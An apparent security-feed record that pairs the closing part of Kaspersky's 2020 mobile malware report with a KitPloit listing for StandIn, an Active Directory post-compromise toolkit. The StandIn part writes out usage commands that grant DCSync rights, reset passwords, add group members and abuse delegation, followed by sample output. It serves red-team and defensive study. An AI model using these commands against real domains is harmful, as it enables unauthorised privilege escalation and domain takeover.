3,254,387 in 2020 against 764,265 \u0432 2019. Unsurprisingly, the share of the former leader, RiskTool, dropped from 32.46% to 21.34%. Third place, as in 2019, was occupied by malware, such as Trojan-Dropper (4.51%) whose share also decreased markedly, by 11.58 p.p.\n\n#### Adware\n\nThe vast majority (almost 65%) of adware discovered in 2020 belonged to the [Ewind](<https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Ewind/>) family. The most common member of that family was AdWare.AndroidOS.Ewind.kp, with more than 2,100,000 installation packages.\n\n**Top 10 adware families discovered in 2020**\n\n**Name of family** | **%*** \n---|--- \nEwind | 64.93 \nFakeAdBlocker | 15.27 \nHiddenAd | 10.09 \nInoco | 2.16 \nAgent | 1.12 \nDnotua | 0.84 \nMobiDash | 0.69 \nSplashAd | 0.66 \nVuad | 0.64 \nDowgin | 0.47 \n \n_* Share of the adware family in the total number of adware packages_\n\nThe Ewind family is an example of aggressive adware. Its members try to monitor the user&#x27;s activities and counteract attempts at removal. In particular, the aforementioned Ewind.kp variant displays an error message upon starting.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125804/mobile_report_2020_04.png>) \n**_AdWare.AndroidOS.__Ewind.kp screenshot_**\n\nAs soon as the user taps OK, the app window will close and its icon will be hidden from the home screen. After that, the Ewind.kp will monitor the user&#x27;s activity and display advertising windows at certain points. In addition to banners in the notification bar, the app will open promoted sites, such as online casinos, in a separate browser window.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125835/mobile_report_2020_05.png>) \n**_Advertising banner (left) and open Ewind.kp browser window with a promoted website (right)_**\n\nWhere did the more than two million Ewind.kp packages come from? Its creators exploit the content of legitimate applications, such as icons and resource files. Resulting packages seldom do anything useful, but Ewind applications created with others&#x27; content could fill up a fake app marketplace. They all have diverse names, icons and installation package sizes, so an unsophisticated user might not even suspect anything is amiss about the store.\n\nThe best part of it is that the AdWare.AndroidOS.Ewind.kp variant has been known since 2018, and we have never once had to adjust the process of detecting it in almost three years. Individuals who generate that many installation packages are obviously not worried about antivirus software.\n\n#### RiskTool\n\nRiskTool-class applications remained one of the three most relevant threats even without showing a significant growth in 2020. Their share declined in relation to others, but in absolute terms, the threats in that class even gained relevance. The major contributing factor was the SMSReg family, which doubled in number to 424,776 applications compared to 2019.\n\n**Top 10 RiskTool families discovered in 2020**\n\n**Name of family** | **%*** \n---|--- \nSMSreg | 41.75 \nRobtes | 16.13 \nAgent | 9.67 \nDnotua | 7.72 \nResharer | 7.50 \nSkymobi | 5.29 \nWapron | 3.42 \nSmsPay | 2.78 \nPornVideo | 1.41 \nPaccy | 0.76 \n \n_* Share of the RiskTool family in the total number of RiskTool packages_\n\n#### Other threats\n\nThe number of backdoors detected almost tripled from **28,889** in 2019 to **84,495** in 2020. However, most of the detected threats notably belonged to older families whose relevance was questionable. Where did these come from? Many members of these families became publicly available, serving as test subjects: for instance, their code was obfuscated to test the antivirus engine&#x27;s detection quality. This does not make a whole lot of sense, as obfuscation is only effective against engines with very limited capabilities. More importantly, however, the legality of these activities is doubtful: lab tests on malware code are acceptable, but publication of samples is ethically questionable at the very least.\n\nThe number of detected Android exploits increased seventeenfold. LPE exploits, relevant to Android versions 4 through 7, accounted for most of the growth. As for exploits for more recent versions of that OS, they are typically device specific.\n\nThe number of Trojan-Proxy threats has increased by twelve times. This type of malware is used by hackers for establishing secure tunnels which they can then use as they see fit. A major threat to the victims is the use of their mobile devices as a mediator in criminal offenses, e.g. downloading of child pornography. This may result in law enforcement agencies taking an interest in the owner of the infected device and asking them questions they would rather avoid. For companies, a secure tunnel between an infected corporate smartphone and an unknown attacker means unauthorized third-party access to internal infrastructure, which, to put it mildly, is undesirable.\n\n#### Top 20 mobile malware programs\n\n_The following malware rankings omit riskware, such as RiskTool and AdWare._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 36.95 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.54 \n3 | DangerousObject.AndroidOS.GenericML | 6.63 \n4 | Trojan-Downloader.AndroidOS.Necro.d | 4.08 \n5 | Trojan-Dropper.AndroidOS.Hqwar.cf | 4.02 \n6 | Trojan-SMS.AndroidOS.Agent.ado | 4.02 \n7 | Trojan.AndroidOS.Hiddad.fi | 2.64 \n8 | Trojan.AndroidOS.Agent.vz | 2.60 \n9 | Trojan-Downloader.AndroidOS.Helper.a | 2.51 \n10 | Trojan.AndroidOS.Handda.san | 1.96 \n11 | Trojan-Downloader.AndroidOS.Agent.ic | 1.80 \n12 | Trojan-Downloader.AndroidOS.Agent.hy | 1.67 \n13 | Trojan.AndroidOS.MobOk.v | 1.60 \n14 | Trojan.AndroidOS.LockScreen.ar | 1.49 \n15 | Trojan.AndroidOS.Piom.agcb | 1.49 \n16 | Trojan.AndroidOS.Hiddapp.ch | 1.46 \n17 | Exploit.AndroidOS.Lotoor.be | 1.39 \n18 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.34 \n19 | Trojan.AndroidOS.Necro.a | 1.29 \n20 | Trojan-Dropper.AndroidOS.Agent.rb | 1.26 \n \n_* Share of users attacked by this type of malware in total attacked users_\n\nThe leaders among the twenty most widespread malicious mobile applications were unchanged from 2019, with only their shares changing slightly. The leader was DangerousObject.Multi.Generic (36.95%), the verdict we use for malware detected by using cloud technology. The verdict is applied where the antivirus databases still lack the signatures or heuristics for detection. The most recent malware is detected that way.\n\nThe Trojan.AndroidOS.Boogr.gsh verdict ranked second with 9.54%. It is assigned to files recognized as malicious by our ML-powered system. Another result of this system&#x27;s work is objects with the verdict DangerousObject.AndroidOS.GenericML (6.63%, ranking third). The verdict is assigned to files whose structure bears a strong similarity to previously known ones.\n\nTrojan-Downloader.AndroidOS.Necro.d (4.08%) ranked fourth. Unlike other malicious programs in that family, which are installation packages, the Necro.d variant is a native ELF executable. We typically detected that Trojan in the read-only system area. It could only make its way there via another Trojan that exploited system privileges or as part of the firmware. Necro.d apparently used the latter path, as one of its capabilities is uploading KINGROOT, a package used for elevation of privileges. Necro.d&#x27;s mission is to download, install and run other apps when instructed by attackers. In addition, it provides remote access to the shell of the infected device.\n\nThe Hqwar dropper ranked fifth and eighteenth simultaneously. This malicious &quot;phoenix&quot; seems to be rising from the ashes, with 39,000 users showing that they were infected in 2020 compared to 28,000 in 2019. Hqwar in a nutshell:\n\n * This is a nesting-doll malicious program that has an external dropper shell next to an obfuscated DEX executable payload.\n * Its main objective is evading detection by the antivirus engine if the device has a security solution installed.\n * Banking Trojans typically serve as the payload.\n\n_Number of users attacked by Hqwar droppers in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125142/09-en-mobile-report-2020.png>))_\n\nIn most cases, banking Trojans unloaded by Hqwar were focused on targets in Russia, specifically, applications operated by Russian financial institutions.\n\n**Top 10 countries by number of users attacked by Hqwar**\n\n| **Country ** | **Share of attacked users** \n---|---|--- \n1 | Russia | 305861 \n2 | Turkey | 22138 \n3 | Spain | 15160 \n4 | Italy | 8314 \n5 | Germany | 3659 \n6 | Poland | 3072 \n7 | Egypt | 2938 \n8 | Australia | 2465 \n9 | Great Britain | 1446 \n10 | USA | 1351 \n \nTrojan-SMS.AndroidOS.ado(4.02%) ranked sixth in the TOP 20 list of mobile malicious programs. This is a typical example of the kind of old-school text-message scams that were popular in 2011 and 2012. Their enduring relevance is a surprise. The Trojan targets Russian-speaking audiences, as Russia is a country with a mature market for buying content by sending text messages to paid phone numbers. This is a modern design, though: the Trojan uses an obfuscator as protection against [reverse engineering](<https://encyclopedia.kaspersky.com/glossary/reverse-engineering/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and detection, and receives commands from external operators. Agent.ado is distributed under the guise of an app installer.\n\nTrojan.AndroidOS.Hiddad.fi (2.64%) ranked seventh. This Trojan handles installation of adware in an infected system, but it can display ads as well.\n\nTrojan.AndroidOS.Vz (2.60%) ranked eighth, a malicious module loaded by other Trojans including members of the Necro family. It serves as an intermediate link in the infection chain, and it is responsible for downloading further modules, for instance, Ewind adware, mentioned above.\n\nTrojan-Downloader.AndroidOS.Helper.a (2.51%) ranked ninth. It exemplifies [occasional difficulty removing](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>) mobile malware from the system. Helper is part of a chain that includes Trojans elevating their access rights on the device and writing themselves or Helper to the system area. In addition to that, the Trojans make changes to the factory reset process, leaving the user few chances to get rid of the malware without outside help. The approach is nothing new, but we saw plenty of users complaining on the Internet about the difficulty they were having removing Helper, something we had not seen before.\n\nTrojan.AndroidOS.Handda.san (1.96%) rounds out the first ten This verdict is an umbrella for a whole group of malicious programs, which include trojans with shared capabilities: icon hiding, obtaining Device Admin rights and using packers to counteract detection.\n\nTrojans in the Trojan-Downloader.AndroidOS.Agent family ranked eleventh and twelfth, their only objective being downloading a payload when instructed by the operators. In both cases, the payload is encrypted and traffic cannot be interpreted to indicate what exactly is being loaded onto the device.\n\nTrojan.AndroidOS.MobOk.v (1,60%) ranked thirteenth. MobOk trojans can automatically subscribe a victim to paid services. They attempted to attack users in Russia more frequently than others in 2020.\n\nThe primitive Trojan.AndroidOS.LockScreen.ar Trojan (1,49%) ranked fourteenth. This malware was first spotted in 2017. Locking the device screen is its only mission.\n\nTrojan.AndroidOS.Hiddapp.ch (1,46%) ranked sixteenth. We assign this verdict to any app that hides its icon in the list of apps immediately upon starting. Subsequent steps may vary, but these are typically downloading or dropping other apps, or displaying ads.\n\nExploit.AndroidOS.Lotoor.be (1,39%), a local exploit for elevating privileges to the superuser, ranked seventeenth. Its popularity should not be surprising, as this type of malware is capable of downloading Necro, Helper and other Trojans in our Top 20.\n\nTrojan.AndroidOS.Necro.a (1,29%), which ranked nineteenth, is a chain of Trojans. It takes root in the system, and it sometimes proves difficult to remove, along with associated Trojans.\n\nRounding out our Top 20 is Trojan-Dropper.AndroidOS.Agent.rb (1,26%). It serves various groups, and objects it is used to pack include both malware and perfectly legitimate software. There are notably two variants: in the first case, the code for decrypting the payload is located in a native library loaded from the main DEX file, and in the second, the dropper code is concentrated within the body of the main DEX file.\n\n### Mobile banking trojans\n\nWe detected 156,710 installation packages for mobile banking Trojans in 2020, which is twice the previous year&#x27;s figure and comparable to 2018.\n\n_Mobile banking Trojan installation packages detected by Kaspersky in 2017 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182758/10-en-ru-es-mobile-report-2020.png>))_\n\nWhereas the statistics for 2018 were seriously affected by an epidemic of the Asacub trojan, the major culprits last year were objects from the [Trojan.AndroidOS.Agent](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Agent/>) family. That family&#x27;s share was just 19.06% in 2019, jumping to 72.79% in 2020.\n\n**Top 10 banking trojans discovered in 2020**\n\n**Name of family** | **%*** \n---|--- \nAgent | 72.79 \nWroba | 5.44 \nRotexy | 5.18 \nAnubis | 2.88 \nFaketoken | 2.48 \nZitmo | 2.16 \nKnobot | 1.53 \nGustuff | 1.48 \nCebruser | 1.43 \nAsacub | 1.07 \n \n_* Share of the mobile banker trojan family in the total number of mobile banker trojan packages_\n\nAgent.eq was the most prolific of all Agent (72.79%) variants. The heuristics turned out to be universal, helping us detect malware belonging to [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>), Wroba and other families.\n\nThe Korean malware [Wroba](<https://securelist.com/roaming-mantis-part-v/96250/>), spread by its operators through [smishing](<https://encyclopedia.kaspersky.com/glossary/smishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), in particular, by sending fake text messages from a logistics company, ranked second. Like many others of its kind, the malware shows the victim one of a number of preset phishing windows, depending on what financial app is running on the home screen.\n\nThe rest of the programs included in the rankings have been well known to researchers for a long time. One exception might be Knobot (1.53%), a relatively new player that targets financial data. Along with phishing windows and interception of 2FA verification messages, the Trojan is equipped with several tools that are uncharacteristic of financial threats. An example of these is hijacking device PINs through exploitation of Accessibility Services. The hackers might need the PIN for manually controlling the device in real time.\n\n_Attacks by mobile banking trojans in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125244/11-en-mobile-report-2020.png>))_\n\nThe surge in attacks in August 2020 is attributed to the Asacub, Agent and Rotexy families. It is through their escalating spread that the stable picture observed up until July was changed.\n\n**Top 10 families of mobile bankers**\n\nFamily | %* \n---|--- \nAsacub | 25.63 \nAgent | 17.97 \nRotexy | 17.92 \nSvpeng | 12.81 \nAnubis | 12.36 \nFaketoken | 10.97 \nHqwar | 5.59 \nCebruser | 2.52 \nGugi | 1.45 \nKnobot | 1.08 \n \n_* Share of users attacked by the family of mobile bankers in total users attacked by mobile banking Trojans_\n\n_Geography of mobile bankers attacks in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125315/12-en-mobile-report-2020.png>))_\n\n**Top 10 countries by share of users attacked by mobile bankers**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Japan | 2.83 \n2 | Taiwan Province, China | 0.87 \n3 | Spain | 0.77 \n4 | Italy | 0.71 \n5 | Turkey | 0.60 \n6 | South Korea | 0.34 \n7 | Russia | 0.25 \n8 | Tajikistan | 0.21 \n9 | Poland | 0.17 \n10 | Australia | 0.15 \n \n_* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period.__ \n** Unique users attacked by mobile bankers in the country as a percentage of all users of Kaspersky mobile solutions in the country._\n\nCompared to 2019, the distribution of countries by number of users attacked by mobile bankers changed significantly. Russia (0.25%), which had ranked first for three years, dropped to seventh place. Japan (2.83%), where the aforementioned Wroba raged, ranked first. The situation was similar in Taiwan (0.87%), which ranked second in our Top 10. Third was Spain (0.77%), where the most popular bankers were Cebruser and Ginp.\n\nItaly (0.71%) ranked fourth. The most common threats in that country were Cebruser and Knobot. In Turkey (0.60%), ranked fifth, users of Kaspersky security solutions most often encountered the Cebruser and Anubis families.\n\nThe most widespread banking trojan in Russia (0.25%) was Trojan-Banker.AndroidOS.Rotexy.e, followed by Svpeng.q and Asacub.snt.\n\n### Mobile ransomware Trojans\n\nWe found 20,708 installation packages for ransomware Trojans in 2020, a decrease of 3.5 times on the previous year.\n\n_Ransomware Trojan installation packages in 2018 through 2020 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2021/02/26182928/13-en-ru-es-mobile-report-2020.png>))_\n\nOverall, the decrease in ransomware can be associated with the assumption that attackers have been converting from ransomware to bankers or combining the features of the two. Current versions of Android prevent applications from locking the screen, so even successful ransomware infection is useless.\n\nHowever, in the field of mobile ransomware, we were in for a nasty surprise.\n\n_Users attacked by mobile ransomware Trojans in 2019 and 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125414/14-en-mobile-report-2020.png>))_\n\nWhereas the beginning of 2020 saw a decrease in the number of users attacked by ransomware trojans, we observed a spike in September, with the indicator then returning to July&#x27;s figures.\n\nLooking closer, we found out that Trojan-Ransom.Win32.Encoder.jya was the most widespread type of ransomware in September. As the verdict shows, the malware is not designed for the Android platform \u2014 it is an encryptor that targets files on Windows workstations. How did that end up on mobile devices? The explanation is simple: September saw Encoder.jya spread via Telegram, while the instant messaging app has both a mobile and desktop client. The attackers clearly targeted Windows users, while mobile users received the malware, one might say, accidentally, due to the mobile version of Telegram syncing downloads with the desktop client. Once in the smartphone memory, the malware was successfully detected by Kaspersky security solutions. A file containing Encoder.jya was most often named as 2-5368451284523288935.rar or AIDS NT.rar.\n\n_Geography of mobile ransomware attacks in 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/01125444/15-en-mobile-report-2020.png>))_\n\n**Top 10 countries by share of users attacked by ransomware Trojans**\n\n**Country*** | **%**** \n---|--- \nUSA | 2.25 \nKazakhstan | 0.77 \nIran | 0.35 \nChina | 0.21 \nItaly | 0.14 \nCanada | 0.11 \nMexico | 0.09 \nSaudi Arabia | 0.08 \nAustralia | 0.08 \nGreat Britain | 0.07 \n \n_* Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period.__ \n** Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAs in 2019, the United States was the country with the most attacked users (2.25%) in 2020. The most common family of mobile ransomware in the country was Svpeng. Kazakhstan (0.77%) ranked second again, Rkor being the most widespread ransomware in that country. Iran (0.35%) remained in third position in our Top 10. The most common type of mobile ransomware there was Trojan-Ransom.AndroidOS.Small.n.\n\n## Conclusion\n\nThe 2020 pandemic has affected every aspect of our lives, and the landscape of mobile threats has been no exception. We saw a decrease in the number of attacks in the first half of the year, which can be attributed to the confusion of the first months of the pandemic: the attackers had other things to worry about. They were back at it in the second half, though, and we saw an increase in attacks involving mobile bankers, such as Asacub and Wroba. Besides that, we saw stronger interest in banking data, both from criminal groups specializing in mass infections and from those who prefer to select their targets carefully. And this, too, was affected by the pandemic: the inability to visit a bank branch forced customers to switch to mobile and online banking, and banks, to consider stepping up the development of those services.\n\nAnother statistically interesting event was an increase in adware, with the Ewind family making a major contribution to this: we discovered more than 2,000,000 packages of the Ewind.kp variant alone. However, these volumes had little, if any, impact on attack statistics. Coupled with Ewind.kp developers&#x27; reluctance to make changes to the core application code, this may indicate that they have opted for quantity over quality.", "modified": "2021-03-01T14:00:29", "published": "2021-03-01T14:00:29", "id": "SECURELIST:C25F1198EDCDE239973899A9C2CEC5C9", "href": "https://securelist.com/mobile-malware-evolution-2020/101029/", "type": "securelist", "title": "Mobile malware evolution 2020", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2021-03-01T15:43:24", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-jb6Ku2Gy9wM/YDSZB-s8ZQI/AAAAAAAAVdA/JOvJA8C4DIoIzpOC8BQlEQtozg3LRwHMACNcBGAsYHQ/s870/StandIn_1_Silk_StandIn.png>)\n\n \n\n\nStandIn is a small AD post-compromise toolkit. StandIn came about because recently at [ xforcered ](<https://github.com/xforcered> \"xforcered\" ) we needed a .NET native solution to perform resource based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features. \n\nI want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits in to the AD [ post-exploitation ](<https://www.kitploit.com/search/label/Post-Exploitation> \"post-exploitation\" ) toolchain. \n\n \n\n\n \n** Roadmap ** \n \n** Contributing ** \n\n\nContributions are most welcome. Please ensure pull requests include the following items: description of the functionality, brief technical explanation and sample output. \n\n \n** ToDo's ** \n\n\nThe following items are currently on the radar for implementation in subsequent versions of StandIn. \n\n * Domain share enumeration. This can be split out into two parts, (1) finding and getting a unique list based on user home directories / script paths / profile paths and (2) querying fTDfs / msDFS-Linkv2 objects. \n * Finding and parsing GPO's to map users to host local groups. \n \n** Subject References ** \n\n\n * An ACE up the sleeve (by [ @_wald0 ](<https://twitter.com/_wald0> \"@_wald0\" ) &amp; [ @harmj0y ](<https://twitter.com/harmj0y> \"@harmj0y\" ) ) - [ here ](<https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors-wp.pdf> \"here\" )\n * Kerberoasting (by [ @ _ xpn _ ](<https://twitter.com/_xpn_> \"@\" ) ) - [ here ](<https://blog.xpnsec.com/kerberos-attacks-part-1/> \"here\" )\n * Roasting AS-REPs (by [ @harmj0y ](<https://twitter.com/harmj0y> \"@harmj0y\" ) ) - [ here ](<https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/> \"here\" )\n * Kerberos Unconstrained Delegation (by [ @spotheplanet ](<https://twitter.com/spotheplanet> \"@spotheplanet\" ) ) - [ here ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation> \"here\" )\n * S4U2Pwnage (by [ @harmj0y ](<https://twitter.com/harmj0y> \"@harmj0y\" ) ) - [ here ](<https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/> \"here\" )\n * Resource-based Constrained Delegation (by [ @spotheplanet ](<https://twitter.com/spotheplanet> \"@spotheplanet\" ) ) - [ here ](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution> \"here\" )\n * Rubeus - [ here ](<https://github.com/GhostPack/Rubeus> \"here\" )\n * Powerview - [ here ](<https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon> \"here\" )\n * Powermad (by [ @kevin_robertson ](<https://twitter.com/kevin_robertson> \"@kevin_robertson\" ) ) - [ here ](<https://github.com/Kevin-Robertson/Powermad> \"here\" )\n \n** Index ** \n\n\n * [ Help ](<https://github.com/FuzzySecurity/StandIn#help> \"Help\" )\n * [ LDAP Object Operations ](<https://github.com/FuzzySecurity/StandIn#ldap-object-operations> \"LDAP Object Operations\" )\n * [ Get object ](<https://github.com/FuzzySecurity/StandIn#get-object> \"Get object\" )\n * [ Get object access permissions ](<https://github.com/FuzzySecurity/StandIn#get-object-access-permissions> \"Get object access permissions\" )\n * [ Grant object access permission ](<https://github.com/FuzzySecurity/StandIn#grant-object-access-permission> \"Grant object access permission\" )\n * [ Set object password ](<https://github.com/FuzzySecurity/StandIn#set-object-password> \"Set object password\" )\n * [ Add ASREP to object flags ](<https://github.com/FuzzySecurity/StandIn#addremove-asrep-from-object-flags> \"Add ASREP to object flags\" )\n * [ Remove ASREP from object flags ](<https://github.com/FuzzySecurity/StandIn#addremove-asrep-from-object-flags> \"Remove ASREP from object flags\" )\n * [ ASREP ](<https://github.com/FuzzySecurity/StandIn#asrep> \"ASREP\" )\n * [ SPN ](<https://github.com/FuzzySecurity/StandIn#spn> \"SPN\" )\n * [ Unconstrained / constrained / resource-based constrained delegation ](<https://github.com/FuzzySecurity/StandIn#unconstrained--constrained--resource-based-constrained-delegation> \"Unconstrained / constrained / resource-based constrained delegation\" )\n * [ DC's ](<https://github.com/FuzzySecurity/StandIn#dcs> \"DC's\" )\n * [ Groups Operations ](<https://github.com/FuzzySecurity/StandIn#groups-operations> \"Groups Operations\" )\n * [ List group membership ](<https://github.com/FuzzySecurity/StandIn#list-group-membership> \"List group membership\" )\n * [ Add user to group ](<https://github.com/FuzzySecurity/StandIn#add-user-to-group> \"Add user to group\" )\n * [ Machine Object Operations ](<https://github.com/FuzzySecurity/StandIn#machine-object-operations> \"Machine Object Operations\" )\n * [ Create machine object ](<https://github.com/FuzzySecurity/StandIn#create-machine-object> \"Create machine object\" )\n * [ Disable machine object ](<https://github.com/FuzzySecurity/StandIn#disable-machine-object> \"Disable machine object\" )\n * [ Delete machine object ](<https://github.com/FuzzySecurity/StandIn#delete-machine-object> \"Delete machine object\" )\n * [ Add msDS-AllowedToActOnBehalfOfOtherIdentity ](<https://github.com/FuzzySecurity/StandIn#add-msds-allowedtoactonbehalfofotheridentity> \"Add msDS-AllowedToActOnBehalfOfOtherIdentity\" )\n * [ Remove msDS-AllowedToActOnBehalfOfOtherIdentity ](<https://github.com/FuzzySecurity/StandIn#remove-msds-allowedtoactonbehalfofotheridentity> \"Remove msDS-AllowedToActOnBehalfOfOtherIdentity\" )\n * [ Detection ](<https://github.com/FuzzySecurity/StandIn#detection> \"Detection\" )\n \n** Help ** \n\n \n \n __ \n ( _/_ _// ~b33f \n __)/(//)(/(/) v0.8 \n \n \n >--~~--> Args? <--~~--< \n \n --help This help menu \n --object LDAP filter, e.g. samaccountname=HWest \n --computer Machine name, e.g. Celephais-01 \n --group Group name, e.g. \"Necronomicon Admins\" \n --ntaccount User name, e.g. \"REDHOOK\\UPickman\" \n --sid String SID representing a target machine \n --grant User name, e.g. \"REDHOOK\\KMason\" \n --guid Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 \n --domain Domain name, e.g. REDHOOK \n --user User name \n --pass Password \n --newpass New password to set for object \n --type Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync \n --spn Boolean, list kerberoastable accounts \n --delegation Boolean, list accounts with unconstrained / constrained delegation \n --asrep Boolean, list ASREP roastab le accounts \n --dc Boolean, list all domain controllers \n --remove Boolean, remove msDS-AllowedToActOnBehalfOfOtherIdentity property from machine object \n --make Boolean, make machine; ms-DS-MachineAccountQuota applies \n --disable Boolean, disable machine; should be the same user that created the machine \n --access Boolean, list access permissions for object \n --delete Boolean, delete machine from AD; requires elevated AD access \n \n >--~~--> Usage? <--~~--< \n \n # Query object properties by LDAP filter \n StandIn.exe --object \"(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))\" \n StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Query object access permissions, optionally filter by NTAccount \n StandIn.exe --object \"distinguishedname=DC=redhook,DC=local\" --access \n StandIn.exe --object samaccountname=Rllyeh$ --access --ntaccount \"REDHOOK\\EDerby\" \n StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Grant object access permissions \n StandIn.exe --object \"distinguishedname=DC=redhook,DC=local\" --grant \"REDHOOK\\MBWillett\" --type DCSync \n StandIn.exe --object \"distinguishedname=DC=redhook,DC=local\" --grant \"REDHOOK\\MBWillett\" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 \n StandIn.exe --object samaccountname=SomeTarget001$ --grant \"REDHOOK\\MBWillett\" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Set object password \n StandIn.exe --object samaccountname=SomeTarget001$ --newpass \"Arkh4mW1tch!\" \n StandIn.exe --object samaccountname=BJenkin --newpass \"Dr34m1nTh3H#u$e\" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Add ASREP to userAccountControl flags \n StandIn.exe --object samaccountname=HArmitage --asrep \n StandIn.exe --object samaccountname=FMorgan --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Remove ASREP from userAccountControl flags \n StandIn.exe --object samaccountname=TMalone --asrep --remove \n StandIn.exe --object samaccountname=RSuydam --asrep --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Get a list of all ASREP roastable accounts \n StandIn.exe --asrep \n StandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Get a list of all kerberoastable accounts \n StandIn.exe --spn \n StandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # List all accounts with unconstrained & constrained delegation privileges \n StandIn.exe --delegation \n StandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Get a list of all domain controllers \n StandIn.exe --dc \n \n # List group members \n StandIn.exe --group Literarum \n StandIn.exe --group \"Magna Ultima\" --domain redhook --user R Fludd --pass Cl4vi$Alchemi4e \n \n # Add user to group \n StandIn.exe --group \"Dunwich Council\" --ntaccount \"REDHOOK\\WWhateley\" \n StandIn.exe --group DAgon --ntaccount \"REDHOOK\\RCarter\" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Create machine object \n StandIn.exe --computer Innsmouth --make \n StandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Disable machine object \n StandIn.exe --computer Arkham --disable \n StandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Delete machine object \n StandIn.exe --computer Danvers --delete \n StandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object properties \n StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543 \n StandIn.exe --computer Providence --sid S-1-5-21-10 85031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n # Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object properties \n StandIn.exe --computer Miskatonic --remove \n StandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e \n \n\n \n** LDAP Object Operations ** \n\n\nAll object operations expect that the LDAP filter returns a single object and will exit out if your query returns more. This is by design. \n\n \n** Get object ** \n \n** Use Case ** \n\n\n> _ Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is member of or when a user account last authenticated to the domain. _\n\n \n** Syntax ** \n\n\nGet all properties of the resolved object. Queries can be simple matches for a single property or complex LDAP filters. \n \n \n C:\\> StandIn.exe --object samaccountname=m-10-1909-01$ \n \n [?] Using DC : m-w16-dc01.main.redhook.local \n [?] Object : CN=M-10-1909-01 \n Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local \n \n [?] Iterating object properties \n \n [+] logoncount \n |_ 360 \n [+] codepage \n |_ 0 \n [+] objectcategory \n |_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local \n [+] iscriticalsystemobject \n |_ False \n [+] operatingsystem \n |_ Windows 10 Enterprise \n [+] usnchanged \n |_ 195797 \n [+] instancetype \n |_ 4 \n [+] name \n |_ M-10-1909-01 \n [+] badpasswordtime \n |_ 0x0 \n [+] pwdlastset \n |_ 10/9/2020 4:42:02 PM UTC \n [+] serviceprincipalname \n |_ TERMSRV/M-10-1909-01 \n |_ TERMSRV/m-10-1909-01.main.redhook.local \n |_ WSMAN/m-10-1909-01 \n |_ WSMAN/m-10-1909-01.main.redhook.local \n |_ RestrictedKrbHost/M-10-1 909-01 \n |_ HOST/M-10-1909-01 \n |_ RestrictedKrbHost/m-10-1909-01.main.redhook.local \n |_ HOST/m-10-1909-01.main.redhook.local \n [+] objectclass \n 